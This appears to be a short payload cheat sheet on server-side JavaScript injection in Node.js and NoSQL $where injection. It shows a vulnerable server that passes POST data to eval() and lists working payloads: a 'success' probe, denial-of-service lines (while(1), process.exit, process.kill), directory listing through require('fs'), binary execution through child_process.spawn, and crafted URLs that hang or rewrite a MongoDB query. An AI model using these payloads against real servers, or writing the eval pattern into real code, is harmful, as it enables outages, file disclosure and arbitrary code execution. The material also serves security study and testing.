Server-Side JavaScript Injection

Sample Code:

var http = require(''http'');
http.createServer(function(request, response) {
if (request.method === ''POST'') {
    var data = '''';
    request.addListener(''data'', function(chunk) {
        data += chunk;
    });
    request.addListener(''end'', function() {
        var stockQuery = eval("(" + data + ")");
        getStockPrice(stockQuery.symbol);…
    });
}

Payload:

response.end(''success'')

The server code would then execute this injected command and return the text “success” as the body of the HTTP response. If an attacker sends this probing request and receives “success” as the response, he knows that the server will execute his
arbitrarily supplied JavaScript, and he can proceed to send some more damaging attacks.

Denial of Service

Payload:

// Payload 1
while(1)

// Payload 2
process.exit()

// Payload 3
process.kill(process.pid)

File System Access

Sample Code:

var fs = require(''fs'');

Payload:

response.end(require(''fs'').readdirSync(''.'').toString())

response.end(require(''fs'').readdirSync(''..'').toString())

Execution of Binary Files

require(''child_process'').spawn(filename);

SQLi

Sample:

$query = ''function() {var search_year = \'''' .
		$_GET[''year''] . ''\'';'' .
		
''return this.publicationYear == search_year || '' .
'' this.filmingYear == search_year || '' .
'' this.recordingYear == search_year;}'';

$cursor = $collection->find(array(''$where'' => $query));

Payload:

http://server/app.php?year=1995'';while(1);var%20foo=''bar
http://server/app.php?year=1995'';return(true);var%20foo=''bar
http://server/app.php?year=1995'';return(false);var%20foo=''bar

Ref

Paper

Show Comments